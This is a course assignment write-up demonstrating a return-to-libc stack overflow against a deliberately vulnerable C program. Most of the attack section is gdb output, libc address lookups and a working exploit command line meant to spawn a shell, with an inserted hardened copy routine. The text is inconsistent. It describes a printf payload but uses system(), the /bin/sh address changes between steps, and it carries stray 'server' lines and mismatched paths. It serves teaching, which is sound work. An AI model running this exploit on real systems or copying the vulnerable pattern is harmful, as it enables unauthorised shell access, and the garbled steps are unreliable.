
Author: Tyler Fisher
Course: PROG 38263: Secure Software Development
Topic: Assignment 7: return to libc attacks
Date: 04/05/14

Return to libc attacks are a type of stack buffer overflow exploit that make use of functions from libc, the shared standard C library that is linked to most programs at runtime. This type of buffer overflow is used to bypass non-executable stack regions and execute arbitrary code. The following code will be used to demonstrate this type of vulnerability.
#include <string.h>

/* Deliberately vulnerable: strcpy() has no length limit, so an argument
 * longer than 127 bytes overruns buffer, the saved EBP and the return address. */
int main(int argc, char *argv[])
{
    char buffer[128];
    if (argc > 1)
        strcpy(buffer, argv[1]);
    return 0;
}
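As an added example (not part of the assignment), the same copy written the way a code review would require it: the caller's buffer size is passed explicitly, input that does not fit is rejected, and the destination is always NUL-terminated. Names such as copy_checked, run_checked and try_length are assumptions introduced here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128

/* The assignment's vulnerable pattern: strcpy() stops only at the NUL byte,
 * so a source longer than 127 bytes runs over the saved EBP and then the
 * saved return address (128 + 4 + 4 = 136 bytes on 32-bit x86). */
void copy_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened replacement (added example). Returns 0 on success, -1 when src
 * does not fit in dst_size bytes including the terminator. memchr() is used
 * so the scan never runs past dst_size bytes of src. Plain strncpy() would
 * not be enough: it leaves dst unterminated when src fills it completely. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {          /* no terminator within dst_size: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);   /* +1 copies the NUL */
    return 0;
}

/* Mirrors the assignment's main(): a 128-byte stack buffer fed from one
 * argument, but the result is returned instead of silently corrupting the frame. */
int run_checked(const char *arg)
{
    char buffer[BUF_SIZE];
    return copy_checked(buffer, sizeof buffer, arg);
}

/* Constructed input of n 'A' bytes (stand-in for the assignment's 136-byte
 * sled) so the length boundary can be checked without a crash. */
int try_length(size_t n)
{
    char arg[512];
    if (n >= sizeof arg)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return run_checked(arg);
}

int main(int argc, char *argv[])
{
    if (argc > 1 && run_checked(argv[1]) != 0)
        fprintf(stderr, "input rejected: longer than %d bytes\n", BUF_SIZE - 1);
    return 0;
}
```

Compiling with -fstack-protector and running under ASLR would additionally turn the overwrite into a detected abort and make the fixed libc addresses used below unreliable, but the length check removes the overflow itself.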

(gdb) disas main
Dump of assembler code for function main:
   0x080483fd <+0>:   push   %ebp
   0x080483fe <+1>:   mov    %esp,%ebp
   0x08048400 <+3>:   sub    $0x88,%esp
   0x08048406 <+9>:   cmpl   $0x1,0x8(%ebp)
   0x0804840a <+13>:  jle    0x8048423 <main+38>
   0x0804840c <+15>:  mov    0xc(%ebp),%eax
   0x0804840f <+18>:  add    $0x4,%eax
   0x08048412 <+21>:  mov    (%eax),%eax
   0x08048414 <+23>:  mov    %eax,0x4(%esp)
   0x08048418 <+27>:  lea    -0x80(%ebp),%eax
   0x0804841b <+30>:  mov    %eax,(%esp)
   0x0804841e <+33>:  call   0x80482d0 <strcpy@plt>
   0x08048423 <+38>:  leave
   0x08048424 <+39>:  ret
End of assembler dump.

# Overflow server buffer and set return address to exit() syscall
printf "%024x\x00\x12\x17\x00" | victim

(gdb) print printf
$1 = {<text variable, no debug info>} 0xf7e3b410 <printf>
(gdb) print exit
$2 = {<text variable, no debug info>} 0xf7e1f750 <exit>
(gdb) print system
$3 = {<text variable, no debug info>} 0xf7e2ca70 <system>

Use an environment variable to store the parameter for the printf() syscall that will act as the payload.
$ export PAYLOAD="SMASH"

(gdb) break main
Breakpoint 1 at 0x80486dd: file server.c, line 29.
(gdb) run
(gdb) x/1000s $esp
...
0xffffd774: "GPG_AGENT_INFO=/run/user/1000/keyring-5wboCk/gpg:0:1"
0xffffd7a9: "ANDROID_SWT=/usr/share/java"
0xffffd7c5: "SHELL=/bin/bash"
0xffffd7d5: "TERM=xterm"
0xffffd7e0: "HISTSIZE=100"
...

(gdb) x/s 0xffffd7c5
0xffffd7c5: "SHELL=/bin/bash"
...
(gdb) x/s 0xffffd7cb
0xffffd7cb: "/bin/bash"

Therefore, in little endian notation:

Address for system() is \x70\xca\xe2\xf7
Address for /bin/sh in the $SHELL environment variable is \xcb\xd7\xff\xff

The payload consists of the return address for printf, the address of the exit() syscall in the server process, and the address for the $PAYLOAD environment variable:

\x70\xca\xe2\xf7SEXY\xcb\xd7\xff\xff

The size of the NOP sled is the sum of the:

Size of the buffer: 128
EBP pointer: 4
RET pointer: 4

Therefore: 136 bytes required to overflow the buffer. Represent this as a sled of 136 NOPs (0x90).
$ gdb -q --args victim `python2 -c 'print "\x90"*136'`
Reading symbols from victim...done.
(gdb) r
Starting program: /home/bob/src/secure_code_development/a6/victim
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()

Find location of exit() - \x50\xf7\xe1\xf7

(gdb) p exit
$1 = {<text variable, no debug info>} 0xf7e1f750 <exit>

Therefore, the exploit can be written as:

./victim `python2 -c 'print "\x90"*132+"\x70\xca\xe2\xf7\x50\xf7\xe1\xf7\x87\xd7\xff\xff"'`

To verify that the exploit executed properly and spawned a shell:

[nott@nott a6]$ gdb -q --args victim `python2 -c 'print "\x90"*132+"\x70\xca\xe2\xf7\x50\xf7\xe1\xf7\x5a\xd7\xff\xff"'`
Reading symbols from victim...done.
(gdb) run
Starting program: /home/nott/src/secure_code_development/a6/victim
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[nott@nott a6]$

Since we're in the newly spawned shell, we might as well exit it.

[nott@nott a6]$ exit
exit
[Inferior 1 (process 18961) exited normally]
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) quit
[nott@nott a6]$

Return to libc exploit in action:
